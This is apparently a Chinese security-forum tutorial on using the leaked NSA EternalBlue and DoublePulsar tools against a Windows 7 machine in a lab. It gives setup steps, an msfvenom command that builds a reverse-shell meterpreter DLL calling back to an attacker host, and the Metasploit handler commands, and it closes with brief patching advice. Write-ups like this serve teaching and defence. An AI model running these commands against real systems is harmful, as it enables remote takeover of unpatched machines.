永恒之蓝

1.NSA泄露工具下载地址:

https://github.com/x0rz/EQGRP_Lost_in_Translation

2.安装方法

环境搭建

注意,必须按照python2.6相关版本,其他版本不奏效。

下载python2.6并安装

下载pywin32并安装

将C:\Python26添加到环境变量PATH中。

配置环境 将EQGRP_Lost_in_Translation下载到的文件解压,找到\windows\fb.py,将,下图中两个部分注释掉。

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_39b56a01170cc8b.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_23291fd01ed3127.png

  1. 实验环境

攻击机1:192.168.71.133,winserver 2008,32bit

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_613ec3ea50c5fcf.png

攻击机2:192.168.71.130 kali2

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_14a8883aa2ff7b6.png

靶机:192.168.199.107,win7 64bit

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_a9a2e1d2a07d991.png

  1. 利用步骤:

在靶机1(192.168.71.133)中安装好python、pywin32以及NSA工具,在C:\shadowbroker-master\windows 中执行fb.py:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_eaf55e7bc91690b.png

分别设置攻击IP地址192.168.199.107,回调地址192.168.71.133(攻击机1),关闭重定向,设置日志路径,新建或选择一个project

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_5c6436fb04f496a.png

接下来输入命令:

use ETERNALBLUE

依次填入相关参数,超时时间等默认参数可以直接回车:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_8e331786f0fe51e.png

由于靶机是win7 系统,在目标系统信息处选择1:win72k8r2

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_aa4e1361fc748e9.png

模式选1:FB

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_b67806a2bd26198.png

确认信息,执行

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_5480346077ceb7c.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_754ebf06d730318.png

成功后,接着运行use Doublepulsar:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_d6566e3f2d00c1d.png

并依次填入参数,注意在function处选择2,rundll

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_68890ccf3467c9e.png

同时在攻击机2 kali的msfvenom 生成攻击dll:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130 LPORT=5555 -f dll > go.dll

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_11c4c9d54b08f3e.png

接着执行:

$ msfconsole

msf > use exploit/multi/handler

msf > set LHOST 192.168.71.130

msf > set LPORT 5555

msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf > exploit

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_1858c1a169a7a78.png

同时将生成的go.dll上传到攻击机1(192.168.71.133),回到攻击机1,填入攻击dll路径:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_4f4b4bace573f10.png

接下来一路回车,执行攻击

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_4f4cc38cd916d4a.png

回到kali,获得shell,攻击成功:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_2a88f3f87676d29.png

5.缓解措施

微软表示已经修补了Shadow Brokers小组发布的Windows漏洞。可能源于国家安全局的黑客工具昨天在线发布,微软能够测试并确认修补程序已经可用于所有当前支持的Windows版本。这意味着较旧的Windows XP或Windows Vista系统仍然可能容易受到发布的三个漏洞的攻击,但是由于Microsoft已经不支持,因此Microsoft不太可能为这些旧版本的Windows提供补丁。

请大家及时更新补丁,并关闭必要的139,445,3389端口。

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_ea76272c56eb5b0.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_2fc005f70a45ab8.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_a9cfa59653135d7.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_4d48478f39aabd5.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_d59a1ca4d84e33e.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_7f0f5ad57130265.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_125889a29c3fde6.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_0ca1160f82b1fad.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_5e218da5acf8bc8.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_58703b683acb866.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_a834f3ab00c63fb.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_326f2c8c307aa38.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_4738d245f8dac6b.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_a3dcdb2cd9b2fb8.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_dc93f1e167a1eb3.png